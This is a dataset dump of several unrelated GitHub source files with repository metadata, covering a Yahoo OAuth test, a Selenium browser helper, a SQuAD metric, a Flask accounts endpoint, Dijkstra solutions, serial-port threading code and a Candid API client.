            response = LoginYahooAuthorizationUrl({}, {}).main()
            self.assertEqual(response['statusCode'], 500)
            self.assertEqual(
                json.loads(response['body']),
                {'message': 'Internal server error: LoginYahooAuthorizationUrl'}
            )

    def test_exec_main_ng_with_yahoo(self):
        # A YahooOauthError is likewise mapped to a generic 500.
        # NOTE(review): same mocked-method-name concern as above.
        with patch('login_yahoo_authorization_url.YahooUtil') as yahoo_mock:
            yahoo_mock.return_value.generate_auth_url.side_effect = YahooOauthError(
                endpoint='http://example.com',
                status_code=400,
                message='error'
            )
            response = LoginYahooAuthorizationUrl({}, {}).main()
            self.assertEqual(response['statusCode'], 500)
            self.assertEqual(
                json.loads(response['body']),
                {'message': 'Internal server error: LoginYahooAuthorizationUrl'}
            )
|
AlisProject/serverless-application
|
tests/handlers/login/yahoo/authorization_url/test_login_yahoo_authorization_url.py
|
test_login_yahoo_authorization_url.py
|
py
| 2,213 |
python
|
en
|
code
| 54 |
github-code
|
6
|
2668239466
|
import multiprocessing
from time import ctime
def consumer(input_q):
    """Consume items from *input_q* forever, acknowledging each one.

    Intended to run as a daemon process; the loop never exits normally.
    """
    print("Into consumer:", ctime())
    while True:
        # Take one item (placeholder for useful work).
        item = input_q.get()
        # BUG FIX: original printed the undefined name ``itemm``.
        print("pull", item, "out of q")
        # BUG FIX: original called the non-existent ``tast_done()``;
        # task_done() signals the JoinableQueue that this item is finished.
        input_q.task_done()
    # Unreachable: kept from the original for documentation purposes.
    print("Out of consumer:", ctime())
def prodeuce(sequence, out_q):
    """Put every item of *sequence* onto *out_q*.

    (Function name kept misspelled for caller compatibility.)
    """
    print("Inpo producer ", ctime())
    for item in sequence:
        # BUG FIX: original wrote to the undefined name ``output_q``
        # instead of the ``out_q`` parameter.
        out_q.put(item)
        print("put", item, "into q")
    print("Out of producer", ctime())
if __name__ == '__main__':
    q = multiprocessing.JoinableQueue()
    # Run the consumer as a daemon so it dies with the main process.
    # BUG FIX: ``args`` must match consumer's single parameter; the original
    # ``args = (q,1)`` raised TypeError inside the child process.
    cons_p = multiprocessing.Process(target=consumer, args=(q,))
    cons_p.daemon = True
    cons_p.start()
    # Produce some items; ``sequence`` stands in for a generator's output
    # or any other production mechanism.
    sequence = [1, 2, 3, 4]
    prodeuce(sequence, q)
    # Block until every queued item has been acknowledged via task_done().
    q.join()
|
Sssssww/pycharm
|
多线程/22.py
|
22.py
|
py
| 1,065 |
python
|
en
|
code
| 0 |
github-code
|
6
|
23391926789
|
from selenium import webdriver
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
import json
from pathlib import Path
from time import sleep
from selm.gales import settings
class Gale():
    """Thin convenience wrapper around a Selenium Chrome WebDriver.

    NOTE(review): uses ``find_element_by_*`` methods, which were removed
    in Selenium 4 -- this class targets Selenium 3.
    """
    def __init__(self, implicitly_wait=12):
        option = webdriver.ChromeOptions()
        # Suppress Chrome's automation banner and noisy logging.
        option.add_experimental_option(
            "excludeSwitches", ['enable-automation', 'enable-logging'])
        # Initialise the driver.
        self.driver = webdriver.Chrome(options=option)
        # Set browser window size/position.
        # self.driver.maximize_window()
        self.driver.set_window_rect(-7, 0, 1190, 1047)
        # Set the implicit wait time.
        self.driver.implicitly_wait(implicitly_wait)

    def get_url(self, url: str):
        '''Navigate to a page.

        Args:
            url (str): target address
        '''
        self.driver.get(url)

    def get_url_by_cookies(self, url: str, cookies_path: Path):
        '''Open *url*, inject cookies loaded from disk, then load it again.

        Args:
            url (str): login address
            cookies_path (Path): where the cookies JSON file is stored
        '''
        self.get_url(url)
        cookies = json.loads(open(cookies_path).read())
        for c in cookies:
            self.driver.add_cookie(c)
        self.get_url(url)
        # self.driver.refresh()

    def get_cookies(self, url: str, file_path: Path, user_data: dict, input_time: int = 12):
        '''Log in (with manual captcha entry) and save session cookies to disk.

        Args:
            url (str): login address
            file_path (Path): where to write the cookies JSON
            user_data (dict): login form data, e.g.
                {
                    "account": (css_selector, str),
                    "password": (css_selector, str),
                    ...
                    "login": css_selector
                }
                NOTE(review): the loop below unpacks each non-"login" value
                as an iterable of (selector, content) pairs, which does not
                match the single-tuple shape shown here -- confirm with
                callers which structure is intended.
            input_time (int, optional): Defaults to 12.  Seconds granted to
                the user for typing the captcha by hand.
        '''
        self.get_url(url)
        for i in user_data:
            if i == 'login':
                continue
            for selector, content in user_data[i]:
                self.find_by_selector(selector).send_keys(content)
            # button_cache.send_keys(content)
        # Wait for the user to type the captcha manually.
        sleep(input_time)
        self.find_by_selector(user_data["login"]).click()
        cookies = self.driver.get_cookies()
        with open(file_path, "w", encoding="utf-8") as f:
            f.write(json.dumps(cookies))

    def find_by_id(self, id):
        '''Find an element by its id attribute.

        Args:
            id (str): id value

        Returns:
            WebElement: the matching element
        '''
        return self.driver.find_element_by_id(id)

    def find_by_selector(self, selector):
        '''Find an element by CSS selector.

        Args:
            selector (str): CSS selector

        Returns:
            WebElement: the matching element
        '''
        return self.driver.find_element_by_css_selector(selector)

    def find_by_xpath(self, xpath):
        '''Find an element by XPath.

        Args:
            xpath (str): XPath expression

        Returns:
            WebElement: the matching element
        '''
        return self.driver.find_element_by_xpath(xpath)

    def wait_clickable(self, ele_path, by="selector", time=10):
        '''Explicitly wait until the element can be clicked; returns it.
        '''
        if by == "selector":
            return WebDriverWait(self.driver, time).until(EC.element_to_be_clickable(
                (By.CSS_SELECTOR, ele_path)))
        elif by == "xpath":
            return WebDriverWait(self.driver, time).until(EC.element_to_be_clickable(
                (By.XPATH, ele_path)))
        else:
            raise TypeError(f"not type {by}")

    def wait_presence(self, ele_path, by="selector", time=10):
        '''Explicitly wait for the element to appear in the DOM.

        Args:
            ele_path (str): locator matching *by*
            by (str, optional): Defaults to "selector"; may also be "xpath"
            time (int, optional): Defaults to 10; explicit wait in seconds

        Raises:
            TypeError: unknown *by* method

        Returns:
            WebElement: the element, if found within the time limit
        '''
        if by == "selector":
            return WebDriverWait(self.driver, time).until(EC.presence_of_element_located(
                (By.CSS_SELECTOR, ele_path)))
        elif by == "xpath":
            return WebDriverWait(self.driver, time).until(EC.presence_of_element_located(
                (By.XPATH, ele_path)))
        else:
            raise TypeError(f"not type {by}")

    def wait_not_presence(self, ele_path, by="selector", time=10):
        '''Explicitly wait until the element is absent from the DOM.
        '''
        if by == "selector":
            return WebDriverWait(self.driver, time).until_not(EC.presence_of_element_located(
                (By.CSS_SELECTOR, ele_path)))
        elif by == "xpath":
            return WebDriverWait(self.driver, time).until_not(EC.presence_of_element_located(
                (By.XPATH, ele_path)))
        else:
            raise TypeError(f"not type {by}")

    def wait_visibility(self, ele_path, by="selector", time=10):
        '''Explicitly wait until the element is visible to the user.
        '''
        if by == "selector":
            return WebDriverWait(self.driver, time).until(EC.visibility_of_element_located(
                (By.CSS_SELECTOR, ele_path)))
        elif by == "xpath":
            return WebDriverWait(self.driver, time).until(EC.visibility_of_element_located(
                (By.XPATH, ele_path)))
        else:
            raise TypeError(f"not type {by}")

    def wait_invisibility(self, ele_path, by="selector", time=10):
        '''Explicitly wait until the element is invisible to the user.
        '''
        if by == "selector":
            return WebDriverWait(self.driver, time).until(EC.invisibility_of_element_located(
                (By.CSS_SELECTOR, ele_path)))
        elif by == "xpath":
            return WebDriverWait(self.driver, time).until(EC.invisibility_of_element_located(
                (By.XPATH, ele_path)))
        else:
            raise TypeError(f"not type {by}")

    def save2png(self, file_name):
        '''Take a screenshot of the current browser window.

        Args:
            file_name (str): image name (saved under the data directory)
        '''
        file_path = settings.DATA_DIR / file_name
        self.driver.get_screenshot_as_file(str(file_path))
        sleep(1)

    def close(self):
        '''Close the current window.
        '''
        self.driver.close()

    def quit(self):
        '''Quit the whole browser.
        '''
        self.driver.quit()

    def refresh(self):
        '''Refresh the page.
        '''
        self.driver.refresh()
|
tyutltf/xaioliangzatan
|
selm/gales/gale.py
|
gale.py
|
py
| 6,838 |
python
|
en
|
code
| 1 |
github-code
|
6
|
43634658293
|
from __future__ import division
from __future__ import absolute_import
#typing
#overrides
from allennlp.common import squad_eval
from allennlp.training.metrics.metric import Metric
class SquadEmAndF1(Metric):
    u"""
    This :class:`Metric` takes the best span string computed by a model, along with the answer
    strings labeled in the data, and computed exact match and F1 score using the official SQuAD
    evaluation script.
    """
    def __init__(self) :
        # Running totals, averaged on read in get_metric().
        self._total_em = 0.0
        self._total_f1 = 0.0
        self._count = 0

    #overrides
    def __call__(self, best_span_string, answer_strings):
        u"""
        Accumulate EM and F1 for one prediction.

        Parameters
        ----------
        best_span_string : the model's predicted answer span
        answer_strings : the gold answer strings; the best score over all
            ground truths is taken, per the official SQuAD script.
        """
        exact_match = squad_eval.metric_max_over_ground_truths(
                squad_eval.exact_match_score,
                best_span_string,
                answer_strings)
        f1_score = squad_eval.metric_max_over_ground_truths(
                squad_eval.f1_score,
                best_span_string,
                answer_strings)
        self._total_em += exact_match
        self._total_f1 += f1_score
        self._count += 1

    #overrides
    def get_metric(self, reset = False) :
        u"""
        Returns
        -------
        Average exact match and F1 score (in that order) as computed by the official SQuAD script
        over all inputs.
        """
        exact_match = self._total_em / self._count if self._count > 0 else 0
        f1_score = self._total_f1 / self._count if self._count > 0 else 0
        if reset:
            self.reset()
        return exact_match, f1_score

    #overrides
    def reset(self):
        self._total_em = 0.0
        self._total_f1 = 0.0
        self._count = 0

    def __str__(self):
        # BUG FIX: the original returned the literal text
        # "SquadEmAndF1(em={self._total_em}, ...)" -- a plain string with no
        # interpolation.  Use str.format to stay py2-compatible.
        return u"SquadEmAndF1(em={}, f1={})".format(self._total_em, self._total_f1)
SquadEmAndF1 = Metric.register(u"squad")(SquadEmAndF1)
|
plasticityai/magnitude
|
pymagnitude/third_party/allennlp/training/metrics/squad_em_and_f1.py
|
squad_em_and_f1.py
|
py
| 1,963 |
python
|
en
|
code
| 1,607 |
github-code
|
6
|
41244754700
|
'''Faça um programa que leia três numeros e mostre qual é o maior e qual é o menor'''
n1 = int(input('Digite um número: '))
n2 = int(input('Digite um número: '))
n3 = int(input('Digite um número: '))
# Largest of the three.
maior = n1
if n2 > n1:
    maior = n2
if n3 > maior:
    maior = n3
# Smallest of the three.
menor = n1
if n2 < n1:
    # BUG FIX: the original assigned the literal 2 instead of n2,
    # so the reported minimum was wrong whenever n2 < n1.
    menor = n2
if n3 < menor:
    menor = n3
print('maior: {} \nmenor: {}'.format(maior,menor))
'''
outra forma
maior = menor = 0
numero = []
for n in range(0,3):
    numero.append(int(input(f'Digite o {n +1}º número: ')))
numero.sort()
print(f'Menor número: {numero[0]}')
print(f'Maior número: {numero[-1]}')'''
|
andrematos90/Python
|
CursoEmVideo/Módulo 1/Desafio 033.py
|
Desafio 033.py
|
py
| 628 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
13301338601
|
from bson.objectid import ObjectId
from flask import Blueprint, jsonify
from assets.extensions import mongo
from assets.decors import errorhandler, tokenrequired
accounts = Blueprint("accounts", __name__, url_prefix="/accounts")
# STATUS
@accounts.route("/<account_id>/status", methods=["GET"])
@tokenrequired
@errorhandler
def get_status(current_user, account_id):
    """Return the Active flag of one of the caller's accounts (200),
    or an error payload for an unknown account id (400)."""
    # query the user collection for account status
    # NOTE(review): the local name ``accounts`` shadows the Blueprint;
    # harmless here, but confusing.  ``current_user["_id"]["$oid"]``
    # presumably comes from a bson-JSON-serialized user -- confirm against
    # the tokenrequired decorator.
    accounts = mongo.db.users.find_one({"_id": ObjectId(current_user["_id"]["$oid"])})[
        "Accounts"]
    if account_id in accounts:
        status = accounts[account_id]["Active"]
        return jsonify({"account_status": status, "account_id": account_id}), 200
    return jsonify({"error": "invalid account id", "account_id": account_id}), 400
@accounts.route("/<account_id>/status", methods=["PUT"])
@tokenrequired
@errorhandler
def update_status(current_user, account_id):
    """Toggle the Active flag of one account via an aggregation-pipeline
    update: ``$eq: [False, current]`` flips True->False and False->True."""
    resp = mongo.db.users.update_one({"_id": ObjectId(current_user["_id"]["$oid"])},
                                     [{"$set": {f"Accounts.{account_id}.Active": {"$eq": [False, f"$Accounts.{account_id}.Active"]}}}])
    # if update did not occur because no account id found
    if resp.matched_count == 0 or resp.modified_count == 0:
        return jsonify({"error": "failed to update status", "account_id": account_id}), 400
    return jsonify({"success": "status updated", "account_id": account_id}), 201
|
TreyThomas93/tos-python-web-app-server
|
api/accounts/__init__.py
|
__init__.py
|
py
| 1,434 |
python
|
en
|
code
| 0 |
github-code
|
6
|
14471424043
|
'''
There are N network nodes, labelled 1 to N.
Given times, a list of travel times as directed edges times[i] = (u, v, w), where u is the source node, v is the target node, and w is the time it takes for a signal to travel from source to target.
Now, we send a signal from a certain node K. How long will it take for all nodes to receive the signal? If it is impossible, return -1.
Example 1:
Input: times = [[2,1,1],[2,3,1],[3,4,1]], N = 4, K = 2
Output: 2
Note:
N will be in the range [1, 100].
K will be in the range [1, N].
The length of times will be in the range [1, 6000].
All edges times[i] = (u, v, w) will have 1 <= u, v <= N and 0 <= w <= 100.
'''
# Dijkstra's heap O(E logE) time and O(N + E) space
from collections import defaultdict
from heapq import *
class Solution:
    def networkDelayTime(self, times: List[List[int]], N: int, K: int) -> int:
        """Dijkstra's algorithm with a binary heap: O(E log E) time,
        O(N + E) space.

        Returns the time for the signal from K to reach every node,
        or -1 if some node is unreachable.
        """
        graph = defaultdict(list)
        for u, v, w in times:
            graph[u].append((w, v))
        pq = [(0, K)]
        dist = {}
        while pq:
            d, node = heappop(pq)
            if node in dist:
                continue  # already settled with a shorter distance
            dist[node] = d
            for d2, nei in graph[node]:
                if nei not in dist:
                    heappush(pq, (d + d2, nei))
        # BUG FIX: the original returned ``max(...) if len(dist) else -1``;
        # len(dist) is truthy as soon as K itself is settled, so -1 was
        # never returned for graphs with unreachable nodes.
        return max(dist.values()) if len(dist) == N else -1
# Dijkstra's basic O(N**2 + E) and O(N + E) space
from collections import defaultdict
class Solution:
    def networkDelayTime(self, times: List[List[int]], N: int, K: int) -> int:
        """Textbook Dijkstra without a heap: O(N**2 + E) time, O(N + E) space.

        Repeatedly settles the unvisited node with the smallest tentative
        distance, then relaxes its outgoing edges. Returns -1 when some
        node remains unreachable from K.
        """
        INF = float('inf')
        adj = defaultdict(list)
        for src, dst, wt in times:
            adj[src].append((wt, dst))

        dist = dict.fromkeys(range(1, N + 1), INF)
        dist[K] = 0
        settled = [False] * (N + 1)

        while True:
            # pick the unvisited node with the smallest finite distance
            best = min(
                (i for i in range(1, N + 1) if not settled[i]),
                key=lambda i: dist[i],
                default=None,
            )
            if best is None or dist[best] == INF:
                break
            settled[best] = True
            for wt, nxt in adj[best]:
                dist[nxt] = min(dist[nxt], dist[best] + wt)

        slowest = max(dist.values())
        return -1 if slowest == INF else slowest
# dfs O(N**N + ElogE) time and O(N + E) space
from collections import defaultdict
class Solution:
    def networkDelayTime(self, times: List[List[int]], N: int, K: int) -> int:
        """DFS relaxation: O(N**N + E log E) worst case, O(N + E) space.

        Recursively propagates arrival times, pruning whenever a node has
        already been reached at least as fast. Visiting cheaper edges first
        (sorted) makes the pruning effective. Returns -1 when some node is
        never reached.
        """
        adj = defaultdict(list)
        for src, dst, wt in times:
            adj[src].append((wt, dst))

        best = {node: float('inf') for node in range(1, N + 1)}

        def visit(node, clock):
            # prune: a faster (or equal) signal already arrived here
            if clock >= best[node]:
                return
            best[node] = clock
            for wt, nxt in sorted(adj[node]):
                visit(nxt, clock + wt)

        visit(K, 0)
        slowest = max(best.values())
        return slowest if slowest < float('inf') else -1
|
loganyu/leetcode
|
problems/743_network_delay_time.py
|
743_network_delay_time.py
|
py
| 3,027 |
python
|
en
|
code
| 0 |
github-code
|
6
|
40017302365
|
# import streamlit as st
# import threading
import time
# # 定义共享变量
# is_running = True
# # 定义线程函数
# def thread_function():
# a = 0
# st.text(f'in to thread')
# global is_running
# while is_running:
# # 线程执行的逻辑
# a += 1
# st.text(a)
# time.sleep(1)
# st.text(f'out thread')
# def stop():
# # 当需要停止线程时
# global is_running
# if st.button('stop'):
# is_running = False
# if st.button('start'):
# is_running = True
# if __name__ == "__main__":
# # 创建线程并启动
# thread = threading.Thread(target=thread_function)
# thread.start()
# stop()
import threading
# 定义共享变量
# Shared stop switch: Event.set()/is_set() are thread-safe by design.
is_running = threading.Event()

def thread_function():
    """Busy-loop, printing 1 each pass, until the shared event fires."""
    while True:
        if is_running.is_set():
            return
        print(1)

# 当需要停止线程时
def stop():
    """Flip the shared event so thread_function exits its loop."""
    is_running.set()
if __name__ == "__main__":
# 创建线程并启动
thread = threading.Thread(target=thread_function)
thread.start()
time.sleep(1)
stop()
# Cooperative shutdown flag shared with the UI thread (see main below).
stop_flag = threading.Event()
def receive_data():
    """Continuously read lines from a serial port and persist each record.

    Outer loop: one iteration per recording cycle, until stop_flag is set.
    Inner loop: reads lines until stop_flag is set or no data has arrived
    for timeout_seconds. Cycles that lasted at least
    fetch_duration_threshold seconds are written to ./temp/received_data.txt.

    NOTE(review): `serial`, `port`, `baud_rate`, `timeout_seconds` and
    `fetch_duration_threshold` are not defined in this chunk — presumably
    module-level config elsewhere in the file; verify before reuse.
    """
    print(f'into receive data')
    while not stop_flag.is_set():
        # a fresh port handle per cycle; closed before the file is written
        ser = serial.Serial(port, baud_rate, timeout=1)
        received_data = [] # List to store received data
        start_time = time.time() # Start time of data fetching
        # inner_time tracks the arrival of the most recent line (idle timer)
        inner_time = time.time()
        while not stop_flag.is_set():
            data = ser.readline().decode().strip() # Read a line of data and remove whitespace
            elapsed_time = time.time() - start_time
            if data:
                print(data)
                received_data.append(data)
                inner_time = time.time()  # reset the idle timer on each line
            # break when the port has been silent for timeout_seconds
            if time.time() - inner_time > timeout_seconds:
                print(f'Time out for: {elapsed_time}')
                break
        ser.close()
        end_time = time.time() - start_time # duration of one cycle
        # Save received data as a text file only if it has been fetched for more than 10 seconds
        if end_time >= fetch_duration_threshold:
            file_name = f"./temp/received_data.txt"
            # Save received data to a new text file
            with open(file_name, 'w') as file:
                file.write('\n'.join(received_data))
            print('Finish one record')
        time.sleep(1) # Wait for 1 second before restarting the loop
    print(f'end receive.')
def main():
    """Streamlit page: start/stop the serial receiver in a background thread.

    NOTE(review): `get_model` and `st` are not defined in this chunk —
    presumably imported/defined earlier in the file; confirm before reuse.
    """
    model = get_model()
    # your drinked
    if st.checkbox("start receive"):
        # create the worker Thread instance
        # NOTE(review): Streamlit re-runs this function on every interaction,
        # so a fresh (unstarted) Thread is created on each rerun — confirm
        # that "stop" followed by "start" behaves as intended.
        t1 = Thread(target=receive_data)
        if st.button("start"):
            print(f'st')
            stop_flag.clear()
            # start the worker thread
            t1.start()
        # signal the worker to stop (it checks stop_flag cooperatively)
        if st.button("stop"):
            stop_flag.set()
            print(f'flag {stop_flag.is_set()}')
|
YuTheon/NUS_AIOT_web2
|
test.py
|
test.py
|
py
| 2,927 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22425229606
|
import typing
from pydantic import BaseModel, root_validator
from candid import CandidApiEnvironment
from candid.client import CandidApi, AsyncCandidApi
from candid.resources.auth.client import AuthClient, AsyncAuthClient
from candid.resources.auth.resources.v_2 import AuthGetTokenRequest
from candid.resources.billing_notes.client import BillingNotesClient, AsyncBillingNotesClient
from candid.resources.encounters.client import EncountersClient, AsyncEncountersClient
from candid.resources.expected_network_status.client import ExpectedNetworkStatusClient, \
AsyncExpectedNetworkStatusClient
from candid.resources.payers.client import PayersClient, AsyncPayersClient
class CandidApiClientOptions(BaseModel):
    """Credentials for the Candid API: either a ready token, or a
    client_id/client_secret pair to exchange for one."""

    token: typing.Optional[str]
    client_id: typing.Optional[str]
    client_secret: typing.Optional[str]

    @root_validator(pre=False)
    def token_or_client_id_and_secret_present(cls, values):
        # Exactly one auth path must be usable: a token, or a full id+secret pair.
        has_token = values.get("token") is not None
        has_credentials = (
            values.get("client_id") is not None
            and values.get("client_secret") is not None
        )
        if not (has_token or has_credentials):
            raise ValueError("Either token or client_id and client_secret must be provided")
        return values
def get_token_for_options(options: CandidApiClientOptions, environment: CandidApiEnvironment) -> str:
    """Resolve an access token: reuse an explicit one, or exchange the
    client_id/client_secret pair via the auth endpoint."""
    if options.token is not None:
        return options.token
    bootstrap = CandidApi(environment=environment, token=None)
    token_response = bootstrap.auth.v_2.get_token(
        request=AuthGetTokenRequest(client_id=options.client_id, client_secret=options.client_secret)
    )
    return token_response.access_token
class CandidApiClient:
    """Synchronous facade over CandidApi, authenticated up front and
    exposing the resource sub-clients as attributes."""

    def __init__(
        self, *, options: CandidApiClientOptions, environment: CandidApiEnvironment = CandidApiEnvironment.PRODUCTION
    ):
        token = get_token_for_options(options, environment)
        api = CandidApi(token=token, environment=environment)
        self.auth = api.auth
        self.encounters = api.encounters
        self.billing_notes = api.billing_notes
        self.expected_network_status = api.expected_network_status
        self.payers = api.payers
class AsyncCandidApiClient:
    """Async facade over AsyncCandidApi, authenticated up front and
    exposing the resource sub-clients as attributes."""

    def __init__(
        self, *, options: CandidApiClientOptions, environment: CandidApiEnvironment = CandidApiEnvironment.PRODUCTION
    ):
        token = get_token_for_options(options, environment)
        api = AsyncCandidApi(token=token, environment=environment)
        self.auth = api.auth
        self.encounters = api.encounters
        self.billing_notes = api.billing_notes
        self.expected_network_status = api.expected_network_status
        self.payers = api.payers
|
candidhealth/candid-python
|
src/candid/candid_api_client.py
|
candid_api_client.py
|
py
| 2,650 |
python
|
en
|
code
| 0 |
github-code
|
6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.